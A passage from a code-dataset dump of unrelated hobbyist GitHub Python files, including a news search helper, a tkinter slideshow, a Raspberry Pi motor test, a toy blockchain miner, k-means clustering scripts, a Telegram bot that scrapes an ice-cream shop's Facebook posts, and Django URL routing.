(info[\"title\"], info[\"url\"])\n for info in news\n ]\n\n\ndef search_by_date(date):\n try:\n get_date = datetime.strptime(date, \"%Y-%m-%d\")\n date_format = datetime.strftime(get_date, \"%d/%m/%Y\")\n\n news = search_news({\"timestamp\": date_format})\n\n return [\n (info[\"title\"], info[\"url\"])\n for info in news\n ]\n\n except ValueError:\n raise ValueError('Data inválida')\n\n\ndef search_by_category(category):\n news = search_news({\n \"category\": {\"$regex\": category, \"$options\": \"i\"},\n })\n\n return [\n (info[\"title\"], info[\"url\"])\n for info in news\n ]\n","repo_name":"yuryss98/project-tech-news","sub_path":"tech_news/analyzer/search_engine.py","file_name":"search_engine.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"43918669862","text":"def df(node, graph):\n visited = set()\n longest_path = 0\n def d(node, graph):\n nonlocal visited, longest_path\n pass\ndef get_with_one_child(graph):\n ks = []\n for key, values in graph.items():\n if len(values) == 1:\n ks.append(key)\n return ks\n\ndef get_with_three_child_or_more(graph):\n ks = []\n for key, values in graph.items():\n if len(values) >= 3:\n ks.append(key)\n return ks\n\n\n\ngoing_to_win = True\n\nn = int(input())\ngraph = {}\nfor i in range(n+1):\n graph[i] = []\n\nfor _ in range(n-1):\n a, b = [int(p) for p in input().split()]\n graph[a].append(b)\n graph[b].append(a)\n\none = get_with_one_child(graph)\nthree = get_with_three_child_or_more(graph)\nimport random\nwhile three:\n first_child = graph[three[0]][random.randint(0, len(graph[three[0]]))]\n idx = 0\n while first_child == one[0]:\n idx += 1\n first_child = graph[three[0]][idx]\n graph[three[0]].remove(first_child)\n graph[first_child].remove(three[0])\n\n graph[one[0]].append(three[0])\n graph[three[0]].append(one[0])\n # three[0]\n # one[0]\n three = get_with_three_child_or_more(graph)\n one = get_with_one_child(graph)\nprint(graph)\n","repo_name":"stanislavkozlovski/python_exercises","sub_path":"hackerrank/hourrank_19/third.py","file_name":"third.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"} +{"seq_id":"4106489634","text":"\"\"\"Single window to display slideshow of images\"\"\"\n\n\nimport tkinter as tk\n\n\nclass SlideShow():\n \"\"\"Class to represent the slideshow window\"\"\"\n\n def __init__(self, title, start_callback, width=400, height=400):\n \"\"\"Initialise window and elements\"\"\"\n self.active = False\n\n self.start_callback = start_callback\n\n self.root = tk.Tk()\n self.root.title(title)\n\n self.root.geometry(\"%dx%d+%d+%d\" % (width, height, 0, 0))\n\n self.progress_label = tk.Label(\n self.root,\n text=\"Click 'Start' to begin\")\n self.progress_label.pack(side='top', fill='both', expand='no')\n\n self.panel = tk.Label(self.root)\n self.panel.pack(side='top', fill='both', expand='yes')\n\n self.startstop_button = tk.Button(\n self.panel,\n text='Start',\n command=self.toggle_start)\n self.startstop_button.pack(side='bottom')\n\n def show(self):\n \"\"\"Show the main window and enter the main loop\"\"\"\n self.root.mainloop()\n\n def toggle_start(self):\n \"\"\"Start/Stop the slideshow\"\"\"\n self.active = not self.active\n if self.active:\n self.startstop_button.config(text=\"Stop\")\n self.start_callback()\n else:\n self.startstop_button.config(text=\"Start\")\n\n def is_active(self):\n \"\"\"Is the slideshow active?\"\"\"\n 
return self.active\n\n    def update_progress(self, index, max_items, message):\n        \"\"\"Update the progress label with some stats\"\"\"\n        progress = (index / max_items)\n        label = \"{:d} ({:.2%}): {:s}\".format(index, progress, message)\n        self.progress_label.config(text=label)\n","repo_name":"tobyoxborrow/chefcodes","sub_path":"slideshow.py","file_name":"slideshow.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"332594480","text":"import RPi.GPIO as GPIO\r\nimport time\r\n\r\n#['BCM', 'BOARD', 'BOTH', 'FALLING', 'HARD_PWM', 'HIGH', 'I2C', 'IN', 'LOW',\r\n#'OUT', 'PUD_DOWN', 'PUD_OFF', 'PUD_UP', 'PWM', 'RISING', 'RPI_INFO', 'RPI_REVISION',\r\n#'SERIAL', 'SPI', 'UNKNOWN', 'VERSION', '__builtins__', '__doc__', '__file__', '__name__',\r\n#'__package__', '__path__', 'add_event_callback', 'add_event_detect', 'cleanup',\r\n#'event_detected', 'getmode', 'gpio_function', 'input', 'output',\r\n#'remove_event_detect', 'setmode', 'setup', 'setwarnings', 'wait_for_edge']\r\n\r\nleadScrewPWMChannel = 9\r\n\r\n# Pin numbers are set according to Pi configuration.\r\npwmPin = 12\r\ndirPin = 11\r\n\r\n\r\nGPIO.setmode(GPIO.BOARD)\r\n\r\nGPIO.setup(dirPin, GPIO.OUT)\r\nGPIO.setup(pwmPin, GPIO.OUT)\r\n\r\n# Initialize PWM frequency to 400 Hz (pulses per second).\r\npwm = GPIO.PWM(pwmPin, 400)\r\n\r\nrodCarriageStepsPerMM = 3.33\r\nrodCarriageStepsPerRev = 200\r\n\r\nleadScrewStepsPerRev = 200\r\n\r\ndef mm2Steps(mm):\r\n    return rodCarriageStepsPerMM*mm\r\n\r\ndef speed2Freq(rpm):\r\n    return rodCarriageStepsPerRev * rpm / 60\r\n\r\n# Set direction of motor\r\nGPIO.output(dirPin, GPIO.HIGH)\r\n\r\n# Set PWM pulse width. This determines the speed of the motor\r\ndist = 100; # Move 100mm\r\nsteps = mm2Steps(dist)\r\npwm.start(50)\r\n\r\nwhile True:\r\n    time.sleep(2)\r\n    GPIO.output(dirPin, GPIO.HIGH)\r\n    time.sleep(2)\r\n    GPIO.output(dirPin, GPIO.LOW)\r\n\r\nGPIO.cleanup()\r\n\r\n\r\n\r\n# test commit\r\n","repo_name":"rwychung/autocompleat","sub_path":"test/driveMotor.py","file_name":"driveMotor.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"17297655049","text":"import socket\nimport hashlib\n#import flask nono need\nimport threading\nimport time\nfrom p2pnetwork import node\nimport math\n\n\nglobal user_id\nglobal globalBlockchain\nglobal canStartMining\nglobal options\nglobal otherIps\nglobal p2pnode\notherIps = []\n\n\n\ncanStartMining = 0\n\nuser_id = 1\nglobalBlockchain = []\ngenesisHash = \"6e31633822177790dd38702db12495af223e72b684ab5950bc4cde10\"\n\nnonce = 0\n\n# not using this because its a webapp now\n#debug = int(input(\"Should debug mode be on? (0 or 1)\\n\"))\ndebug = 0\n#init sha3_224\ns = hashlib.sha3_224()\nif(debug == 1):\n\n    print(s.name + \" algorithm initialized\")\n\n    #sha3_224 digest size\n    print(\"digest size: \" + str(s.digest_size))\n\n    #test genesis hash\n    s.update(b\"Sat, Dec 18, 2021\")\n    print(\"test genesis hash: \")\n    print(s.hexdigest())\n    print(\"expected hash:\")\n    print(genesisHash)\n    if(s.hexdigest() == genesisHash):\n        print(\"hash is ok! 
proceeding.\")\n else:\n print(\"hash was incorrect!\")\n quit(1)\n \n testTransaction1 = {\n \"startUser\": \"server\",\n \"endUser\": \"u2\",\n \"amount\": \"10\"\n }\n testTransaction2 = {\n \"startUser\": \"u2\",\n \"endUser\": \"u1\",\n \"amount\": \"20\"\n }\n \n nonce = 0\n foundHash = 0\n while foundHash == 0:\n nonce += 1\n testBlock = []\n testBlock.append(nonce)\n testBlock.append(genesisHash)\n testBlock.append(testTransaction1)\n testBlock.append(testTransaction2)\n s.update(bytes(str(testBlock), \"utf-8\"))\n hash = s.hexdigest()\n if(hash[:5] == \"00000\"):\n testBlock.append(hash)\n foundHash = 1\n print(\"testBlock: \" + str(testBlock))\n print(\"nonce for testBlock: \" + str(nonce))\n print(\"hash of testBlock: \" + hash)\n print(\"DEBUG OVER, PROCEEDING TO MAIN APP\")\n print(\"\\n\")\n\n#actually do stuff\nprint(\"Quantonium v0.1\")\n\nglobal t1\nglobal t2\nglobal t3\ndef blockchainMinerLoop():\n global canStartMining\n global globalBlockchain\n\n genesisBlock = [\"-1\", \n \"6e31633822177790dd38702db12495af223e72b684ab5950bc4cde10\"]\n blockchain = [genesisBlock]\n globalBlockchain = blockchain\n while True:\n print(\"blockchain: \" + str(globalBlockchain)+\"\\n\")\n nonce = 0\n foundHash = 0\n transaction = {\n \"startUser\": \"server\",\n \"endUser\": user_id,\n \"amount\": \"10\"\n }\n prevBlock = blockchain[-1]\n prevHash = prevBlock[-1]\n while foundHash == 0:\n nonce += 1\n block = []\n block.append(nonce)\n block.append(prevHash)\n block.append(transaction)\n s.update(bytes(str(block), \"utf-8\"))\n hash = s.hexdigest()\n if(hash[:5] == \"00000\"):\n block.append(hash)\n foundHash = 1\n blockchain.append(block)\n globalBlockchain = blockchain\n #TODO: add p2p connection\n\nt1 = threading.Thread(target=blockchainMinerLoop)\n\ndef p2pStart():\n global otherIps\n global p2pnode\n def node_callback(event, node, connected_node, data):\n try:\n if event != 'node_request_to_stop': # node_request_to_stop does not have any connected_node, while it is the main_node that is stopping!\n print('Event: {} from main node {}: connected node {}: {}'.format(event, node.id, connected_node.id, data))\n\n except Exception as e:\n print(e)\n\n # The main node that is able to make connections to other nodes\n # and accept connections from other nodes on port 8001.\n p2pnode = node.Node(\"0.0.0.0\", 80, node_callback)\n\n # Do not forget to start it, it spins off a new thread!\n p2pnode.start()\n time.sleep(1)\n\n while True:\n for x in range(0, len(otherIps)):\n p2pnode.connect_with_node(otherIps[x], 80)\n p2pnode.send_to_nodes('{\"message\": \"OLPing\"}')\n time.sleep(0.05) # connection throttling sucks ass\n\n\n # Gracefully stop the node.\n p2pnode.stop()\n\nt3 = threading.Thread(target=p2pStart)\n\n#start flask\n#t2.start()\n#print(\"Flask/Browser View thread started.\")\nt3.start()\n\ntime.sleep(1)\ndef getOptions(): \n global options\n global t1\n global t3\n global otherIps\n options = input(\"Would you like to CONFIGURE NODEWEB (1), SEND QTM (2), or MINE QTM (3)?\\n\\n\")\n\n try:\n options = int(options)\n except:\n print(\"try again, that isn't a number\")\n getOptions()\n if(options == 1):\n print(\"IP List: \" + str(otherIps))\n addip = input(\"What other IP should we add to your node?\\n\")\n otherIps.append(socket.gethostbyname(addip))\n getOptions()\n if(options == 3):\n 
t1.start()\n\ngetOptions()\n","repo_name":"hotcocoaNcode/Quantonium","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"31387845367","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nfrom PIL import Image\nnp.set_printoptions(threshold=np.nan)\nimport matplotlib.pyplot as plt\n\n\n\n# In[9]:\n\n\nimage = Image.open('Images/Image1.png')\nX = np.array(image)\nX = X/255\nimgplot = plt.imshow(X)\nplt.show()\nX = X.reshape(X.shape[0]*X.shape[1],4)\nX = X.transpose()\nlabels = np.zeros((1,X.shape[1]))\nX = np.append(X,labels,axis = 0)\n\n\n# # <center>Visualizing data</center>\n\n# In[3]:\n\n\nfrom mpl_toolkits.mplot3d import Axes3D\n\n\nfig = plt.figure()\n\nax = fig.add_subplot(111, projection='3d')\n\nxs = np.real(X[0,0:50000])\nys = np.real(X[1,0:50000])\nzs = np.real(X[2,0:50000])\nxt = np.real(X[0,250000:300000])\nyt = np.real(X[1,250000:300000])\nzt = np.real(X[2,250000:300000])\n\nax.scatter(xs, ys,zs , c='c', marker='o')\nax.scatter(xt, yt,zt , c='m', marker='o')\n\nax.set_xlabel('X Label')\nax.set_ylabel('Y Label')\nax.set_zlabel('Z Label')\n\nplt.show()\n\n\n# # <center>Compute initial centroids</center>\n\n# In[4]:\n\n\ndef init_centroids(a,k):\n centroids = np.zeros((np.shape(a)[0],k))\n for i in range(0,k):\n num = np.random.randint(0,np.shape(a)[1])\n centroids[:,i] = a[:,num]\n centroids[4,i] = i\n a[4,num] = i\n return centroids\n\n\n# # <center>Computer new centroids</center>\n\n# In[5]:\n\n\ndef new_centroids(a,k):\n new_centroids = np.zeros((np.shape(a)[0],k))\n for i in range(0,k):\n new_centroids[:,i] = np.mean(a[:,a[4,:]==i],axis = 1)\n print(np.shape(new_centroids))\n return new_centroids\n\n\n# # <center>Compute distance to centroids & assign labels</center>\n\n# In[6]:\n\n\nfrom scipy.spatial.distance import cdist as cd\n\ndef distance(a,centroids):\n index2 = np.shape(centroids)[1]\n temp = np.zeros((1,index2))\n print(np.shape(a))\n for i in range(0,np.shape(a)[1]):\n temp = cd([a[0:4,i].transpose()],centroids[0:4,:].transpose(),metric = 'euclidean')\n closest_centroid = np.argmin(temp)\n temp2 = centroids[:,closest_centroid]\n a[:,i] = temp2\n return a\n\n\n# In[7]:\n\n\nnum_centroids = 24\nX_temp = np.zeros((5,409960))\ncentroids = init_centroids(X,num_centroids)\nX_temp = distance(X,centroids)\nfor i in range(0,1):\n centroids_new = new_centroids(X_temp,num_centroids)\n centroids = centroids_new\n X_temp = distance(X_temp,centroids)\n \n\n\n# In[8]:\n\n\nimport scipy.misc\n\nr = X_temp[0,:]\ng = X_temp[1,:]\nb = X_temp[2,:]\nr = r.reshape(740,554)\ng = g.reshape(740,554)\nb = b.reshape(740,554)\nrgb = np.dstack((r*255,g*255,b*255))\n\nscipy.misc.imsave('rgb.jpg',rgb)\nimage = Image.open('rgb.jpg')\nimgplot = plt.imshow(image)\nplt.show()\n\n","repo_name":"shubham2604/MachineLearning","sub_path":"Python_codes/Image_compression_using_k_means.py","file_name":"Image_compression_using_k_means.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"93316100","text":"import Statics\nimport random as ran\n\nclass kmeans():\n def __init__(self, initializationMethod):\n self.initializationMethod = initializationMethod\n\n def main(self, k):\n assignedCluster = []\n newCentroids = []\n\n # Calculate initial centroids\n if self.initializationMethod == \"plus\":\n initialCentroids = self.initializePlus(k)\n elif 
self.initializationMethod == \"normal\":\n initialCentroids = self.initializeClusters(k)\n elif self.initializationMethod == \"spread\":\n initialCentroids = self.initializeSpread(k)\n\n # adjust centroids by iteration, stop when finished or max iterations\n for num in range(0, Statics.maxIterations):\n #TODO: how to copy elements?\n assignedCluster [:] = [] #delete values in list\n assignedCluster [:] = self.assign_Centroid(initialCentroids, k)\n newCentroids [:] = [] #delete values in list\n newCentroids [:] = self.recalculate_Centroids(assignedCluster, k)\n # recognizing natural finish point\n if initialCentroids == newCentroids:\n break;\n\n if num==Statics.maxIterations:\n assignedCluster [:] = self.assign_Centroid(newCentroids, k)\n\n initialCentroids [:] = list(newCentroids)\n\n return newCentroids, assignedCluster\n\n\n # initializes k centroids\n # picks random data points as initial centroids\n def initializeClusters(self, k):\n centroids = [];\n for cluster in range(0, k):\n ch = ran.choice(Statics.data)\n centroids.append(ch)\n return centroids\n\n def initializePlus(self, k):\n centroids = [];\n centroids.append(ran.choice(Statics.data))\n\n for cluster in range(1, k):\n # Calculate distance to nearest centroid for each data point\n minDistances = [] # Holds the distances to the nearest centroid for each data point\n distances = []\n totalDistance = 0\n\n for datapoint in Statics.data:\n # Store distances to all clusters and pick nearest from this\n distances [:] = []\n\n for centroid in centroids:\n distances.append(self.calculate_LDistance(datapoint, centroid, 2))\n\n # Pick the nearest cluster for the current data point\n minDistances.append([Statics.data.index(datapoint), min(distances)])\n totalDistance += min(distances)\n\n # Fill a cummulative list, 0 to 1, with appropiate probabilities, which is used to pick the new centroid by weighted probability\n cumProbabilities = []\n previousProb = 0\n for minDistance in minDistances:\n probability = (minDistance[1]/totalDistance) * 100\n if minDistance == minDistances[0]:\n cumProbabilities.append([minDistance[0], probability])\n else:\n cumProbabilities.append([minDistance[0], previousProb + probability])\n previousProb += probability\n\n r = ran.uniform(0.0, 100.0)\n for cumProbability in cumProbabilities:\n if r < cumProbability[1]:\n centroids.append(Statics.data[cumProbability[0]])\n break\n\n return centroids\n\n # Picks points as far away from each other as possible as initial clusters\n def initializeSpread(self, k):\n centroids = []\n\n # Get minimum values for all dimensions and use these as first centroid\n minimumValues = []\n for dataPoint in Statics.data:\n if dataPoint == Statics.data[0]:\n for dimension in range(0, len(dataPoint)):\n minimumValues.append(dataPoint[dimension])\n else:\n for dimension in range(0, len(dataPoint)):\n if dataPoint[dimension] < minimumValues[dimension]:\n minimumValues[dimension] = dataPoint[dimension]\n centroids.append(minimumValues)\n\n # Calculate all distances from data points to their nearest cluster\n for cluster in range(1, k):\n # Calculate distance to nearest centroid for each data point\n minDistances = [] # Holds the distances to the nearest centroid for each data point\n distances = []\n\n for datapoint in Statics.data:\n # Store distances to all clusters and pick nearest from this\n distances[:] = []\n\n for centroid in centroids:\n distances.append(self.calculate_LDistance(datapoint, centroid, 2))\n\n # Pick closest cluster for the current data point\n 
minDistances.append(sum(distances))\n\n # Select the data point of which its nearest cluster is the furthest away, and use this as the new centroid\n centroids.append(Statics.data[minDistances.index(max(minDistances))])\n\n return centroids\n\n def calculate_LDistance (self, currentData, currentCentroid, lNorm):\n return pow(sum([pow(abs(currentData - currentCentroid),lNorm) for currentData, currentCentroid in zip(currentData, currentCentroid)]),(1/lNorm))\n\n def calculate_ChebyshevDistance (self, currentData, currentCentroid):\n return max([abs(currentData - currentCentroid) for currentData, currentCentroid in zip(currentData, currentCentroid)])\n\n # assigns data points to the nearest centroid\n def assign_Centroid(self, centroids, k):\n distance = []\n cluster = []\n j=0\n while (j<Statics.lines):\n i=0\n currentData = Statics.data[j]\n while (i<k):\n\n currentCentroid = centroids[i]\n #calculate euclidean distance from one datapoint to all centroids\n distance.append(self.calculate_LDistance(currentData, currentCentroid, 2))\n #distance.append(calculate_ChebyshevDistance(currentData, currentCentroid))\n i = i+1\n #choose the index of the smallest difference\n cluster.append(distance.index(min(distance)))\n distance [:] = []\n j =j+1\n return cluster\n\n def recalculate_Centroids (self, assignedCluster, k):\n # calculate new Centroids, by using the mean of all data points\n localCentroids = []\n for num in range(0,k):\n #list of indices for datapoints assigned to chosen cluster\n index = [ idx for idx, val in enumerate(assignedCluster) if val == num]\n #list of datapoints, identified by using indices\n temparray = [Statics.data[i] for i in index]\n #creating the sum of each dimension of the selected DataPoints\n sumarray = [sum(i) for i in zip(*temparray)]\n #Get the number of data points of each dimension to create mean\n listLength = sum(1 for x in temparray if isinstance(x,list))\n #create mean for each dimension\n localCentroids.append([x / listLength if sum else 0 for x in sumarray])\n return localCentroids\n\n def calculateSumSquaredError (self, localCentroids, assignedCluster, lNorm):\n sumSquareDistance = 0\n counter = 0\n while (counter<Statics.lines):\n currentData= Statics.data[counter]\n currentCentroid = localCentroids[assignedCluster[counter]]\n #calculate distance from one datapoint to assigned cluster centr oid\n sumSquareDistance = sumSquareDistance + pow(self.calculate_LDistance(currentData, currentCentroid, lNorm),2)\n #sumSquareDistance = sumSquareDistance + pow(calculate_ChebyshevDistance(currentData, currentCentroid), 2)\n counter =counter+1\n return sumSquareDistance\n\n def getClusterStatistics (self, assignedClusters, k):\n stat = [0] * k\n for i in range(0, len(assignedClusters)):\n stat[assignedClusters[i]] = stat[assignedClusters[i]] +1\n return stat","repo_name":"ReneRa/K-Means-Clustering","sub_path":"k-means/src/KMeans.py","file_name":"KMeans.py","file_ext":"py","file_size_in_byte":8058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"29259181112","text":"import configparser\nimport datetime\nimport logging\nimport os\nimport re\nfrom typing import Dict\n\nfrom facebook_scraper import get_posts\nfrom telegram import Update\nfrom telegram.ext import Updater, CommandHandler, CallbackContext\n\nfrom message_util import already_registered, help_message, successfully_registered, register_first, \\\n watching_no_flavors\nfrom persist_data import write_data_to_file, read_data_from_file\nfrom user 
import User\n\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\n\ndata: Dict[str, User] = read_data_from_file()\nconfig = configparser.ConfigParser()\nif os.path.isfile(\"/config/config\") or os.path.isfile(\"../config\"):\n config.read(\"/config/config\" if os.path.isfile(\"/config/config\") else \"../config\")\nelse:\n logging.log(logging.ERROR, \"Config is missing\")\n\ncache: Dict[str, any] = {\n \"cache_text\": None,\n \"cache_date\": None\n}\n\n\ndef start(update: Update, context: CallbackContext) -> None:\n username = update.effective_user.username\n if username in data:\n context.bot.sendMessage(text=already_registered, chat_id=update.effective_user.id)\n else:\n context.bot.sendMessage(text=help_message, chat_id=update.effective_user.id)\n data[username] = User(username=username)\n write_data_to_file(data)\n context.bot.sendMessage(text=successfully_registered, chat_id=update.effective_user.id)\n\n\ndef configure(update: Update, context: CallbackContext) -> None:\n username = update.effective_user.username\n if username not in data:\n context.bot.sendMessage(text=register_first, chat_id=update.effective_user.id)\n return\n token = update.message.text.replace(\"/configure\", \"\").lstrip()\n if not token:\n return\n data.get(username).page_url = token\n write_data_to_file(data)\n context.bot.sendMessage(text=\"Updated subscribed shop.\", chat_id=update.effective_user.id)\n\n\ndef add(update: Update, context: CallbackContext) -> None:\n username = update.effective_user.username\n if username not in data:\n context.bot.sendMessage(text=register_first, chat_id=update.effective_user.id)\n return\n token = update.message.text.replace(\"/add\", \"\").lstrip()\n if not token:\n return\n if token.lower() not in data.get(username).ice_cream_flavors:\n data.get(username).ice_cream_flavors.append(token.lower())\n write_data_to_file(data)\n message = str(\"Now watching out for: {}\").format(token.capitalize())\n context.bot.sendMessage(text=message, chat_id=update.effective_user.id)\n\n\ndef remove(update: Update, context: CallbackContext) -> None:\n username = update.effective_user.username\n if username not in data:\n context.bot.sendMessage(text=register_first, chat_id=update.effective_user.id)\n return\n message = update.message.text.replace(\"/remove\", \"\").lstrip()\n if not message:\n return\n if message.lower() in data.get(username).ice_cream_flavors:\n data.get(username).ice_cream_flavors.remove(message.lower())\n write_data_to_file(data)\n context.bot.sendMessage(text=\"Removed {}\".format(message.capitalize()), chat_id=update.effective_user.id)\n\n\ndef post(update: Update, context: CallbackContext) -> None:\n username = update.effective_user.username\n if username not in data:\n context.bot.sendMessage(text=register_first, chat_id=update.effective_user.id)\n return\n if get_post() is not None:\n context.bot.sendMessage(text=get_post(), chat_id=update.effective_user.id)\n\n\ndef list_flavors(update: Update, context: CallbackContext) -> None:\n username = update.effective_user.username\n if username not in data:\n context.bot.sendMessage(text=register_first, chat_id=update.effective_user.id)\n return\n if len(data.get(username).ice_cream_flavors) > 0:\n message: str = \"\"\n for flavor in data.get(username).ice_cream_flavors:\n message += flavor.capitalize() + \"\\n\"\n context.bot.sendMessage(text=message, chat_id=update.effective_user.id)\n else:\n context.bot.sendMessage(text=watching_no_flavors, 
chat_id=update.effective_user.id)\n\n\ndef help(update: Update, context: CallbackContext) -> None:\n context.bot.sendMessage(text=help_message, chat_id=update.effective_user.id)\n\n\ndef get_update(update: Update, context: CallbackContext) -> None:\n username = update.effective_user.username\n if username not in data:\n context.bot.sendMessage(text=register_first, chat_id=update.effective_user.id)\n return\n if get_available_message(username) is not None:\n context.bot.sendMessage(chat_id=update.message.chat_id, text=get_available_message(username))\n\n\ndef start_notify(update: Update, context: CallbackContext) -> None:\n username = update.effective_user.username\n if username not in data:\n context.bot.sendMessage(text=register_first, chat_id=update.effective_user.id)\n return\n if len(context.job_queue.get_jobs_by_name(username)) != 0:\n context.bot.sendMessage(chat_id=update.message.chat_id, text=\"Already subscribed to notifications.\")\n return\n time = datetime.time(10, 20, 00)\n args = {\"username\": username,\n \"chat_id\": update.message.chat_id}\n context.job_queue.run_daily(\n callback=notify_job,\n time=time,\n days=tuple(range(7)),\n context=args,\n name=username)\n context.bot.sendMessage(text=\"You'll get notified at {} UTC.\".format(time.isoformat(timespec=\"minutes\")),\n chat_id=update.effective_user.id)\n\n\ndef stop_notify(update: Update, context: CallbackContext) -> None:\n username = update.effective_user.username\n if username not in data:\n context.bot.sendMessage(text=register_first, chat_id=update.effective_user.id)\n return\n if len(context.job_queue.get_jobs_by_name(username)) == 0:\n context.bot.sendMessage(text=\"You are not subscribed to notifications yet.\", chat_id=update.effective_user.id)\n return\n context.job_queue.get_jobs_by_name(username)[0].schedule_removal()\n context.bot.sendMessage(text=\"You'll not get notified any longer.\", chat_id=update.effective_user.id)\n\n\ndef notify_job(context):\n if get_available_message(context.job.context.get(\"username\")) is not None:\n context.bot.sendMessage(chat_id=context.job.context.get(\"chat_id\"),\n text=get_available_message(context.job.context.get(\"username\")))\n\n\ndef get_available_message(username: str) -> str or None:\n if username not in data:\n return None\n post = get_post()\n available_flavors: list[str] = list()\n user: User = data.get(username)\n for flavor in user.ice_cream_flavors:\n if user.page_url.casefold() == \"both\".casefold():\n if flavor.casefold() in post.casefold():\n available_flavors.append(flavor)\n elif \"Lindenhof\".casefold() == user.page_url.casefold() \\\n and flavor.casefold() in re.search(\"Lindenhof((?:.|\\s)*?)Limburgerhof\", post,\n flags=re.IGNORECASE).group(1) \\\n or \"Limburgerhof\".casefold() == user.page_url.casefold() \\\n and flavor.casefold() in re.search(\"Limburgerhof((?:.|\\s)*?)$\", post, flags=re.IGNORECASE).group(1):\n available_flavors.append(flavor)\n if len(available_flavors) > 0:\n return \"The following flavors are available today: {}\".format(', '.join(available_flavors))\n\n\ndef get_post() -> str:\n date_today = datetime.date.today()\n cache_date = cache[\"cache_date\"]\n cache_text = cache[\"cache_text\"]\n if cache_date is not None and cache_date == date_today:\n return cache_text.casefold()\n else:\n posts = get_posts(\"eismanufakturzeitgeist\", pages=1, cookies=config['Cookies']['path-to-cookies'])\n for post in posts:\n if post['time'].date() == date_today:\n cache[\"cache_text\"] = post['text']\n cache[\"cache_date\"] = date_today\n 
return cache[\"cache_text\"].casefold()\n\n\ndef main() -> None:\n \"\"\"Start the bot.\"\"\"\n # Create the Updater and pass it your bot's token.\n updater = Updater(config['Telegram']['bot-token'])\n\n # Get the dispatcher to register handlers\n dispatcher = updater.dispatcher\n\n # on different commands - answer in Telegram\n dispatcher.add_handler(CommandHandler(\"start\", start))\n dispatcher.add_handler(CommandHandler(\"add\", add))\n dispatcher.add_handler(CommandHandler(\"remove\", remove))\n dispatcher.add_handler(CommandHandler(\"list\", list_flavors))\n dispatcher.add_handler(CommandHandler(\"configure\", configure))\n dispatcher.add_handler(CommandHandler(\"update\", get_update))\n dispatcher.add_handler(CommandHandler(\"post\", post))\n dispatcher.add_handler(CommandHandler(\"start_notify\", start_notify, pass_job_queue=True))\n dispatcher.add_handler(CommandHandler(\"stop_notify\", stop_notify, pass_job_queue=True))\n dispatcher.add_handler(CommandHandler(\"help\", help))\n\n # on non command i.e message - echo the message on Telegram\n # dispatcher.add_handler(MessageHandler(Filters.text & ~Filters.command, echo))\n\n # Start the Bot\n updater.start_polling()\n\n # Run the bot until you press Ctrl-C or the process receives SIGINT,\n # SIGTERM or SIGABRT. This should be used most of the time, since\n # start_polling() is non-blocking and will stop the bot gracefully.\n updater.idle()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"RatzzFatzz/zeitgeist-notifier","sub_path":"src/facebook_notifier.py","file_name":"facebook_notifier.py","file_ext":"py","file_size_in_byte":9539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"3668436398","text":"#-*- coding: utf-8 -*-\n\nfrom django.conf import settings\nfrom django.conf.urls import include, url\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom perso.views import create_error_view\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^namegen/', include(\"namegen.urls\")),\n url(r'^dynimg/', include(\"dynimg.urls\")),\n url(r'^playel/', include(\"playel.urls\")),\n url(r'^profs/', include(\"profs.urls\")),\n url(r'^avatar/', include(\"avatar.urls\")),\n url(r'^quotes/', include(\"quotes.urls\")),\n url(r'^register/', include(\"register.urls\")),\n url(r'^blog/', include(\"perso.urls\")),\n url(r'^', include(\"portfolio.urls\")),\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\nif settings.DEBUG:\n import debug_toolbar\n urlpatterns = [\n url(r'^__debug__/', include(debug_toolbar.urls))\n ] + urlpatterns\n\nhandler400 = create_error_view(code=400)\nhandler403 = create_error_view(code=403)\nhandler404 = create_error_view(code=404)\nhandler500 = create_error_view(code=500)\n","repo_name":"crazy-djactor/LMinaw","sub_path":"leminaw/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"72152699847","text":"\"\"\"\nTreći dio: Support Vector Machine\nPotrebno je provesti pretraživanje po rešetki nad hiperparametrima C i gamma kako bi se dobile optimalne vrijednosti\nza sve setove podataka. Očekuje se da će oni biti malo drugačiji za različite setove.\nC - dozvoljena pogreška klasifikacije; obrnuto proporcionalna jačina regularizacije lambda, C=1/lambda\ngamma - koef. 
